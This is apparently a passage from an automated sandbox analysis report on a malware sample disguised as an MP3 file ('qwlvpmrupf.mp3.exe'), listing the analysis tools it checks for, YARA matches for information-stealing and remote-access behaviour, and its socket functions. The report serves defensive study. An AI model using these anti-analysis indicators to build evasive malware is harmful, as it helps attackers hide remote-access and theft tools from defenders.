Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214186237.0000000001A50000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217828434.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVGUI.exe
Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Procmon.exe
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

Source: Yara match File source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_81
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_XP
Source: qwlvpmrupf.mp3.exe, 00000013.00000000.2185210747.0000000000E53000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_XPe
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_VISTA
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_7
Source: qwlvpmrupf.mp3 Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 7_2_003F2163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 7_2_003F1B61
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A49B4B socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError, 15_2_05A49B4B
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E12163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 16_2_00E12163
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E11B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 16_2_00E11B61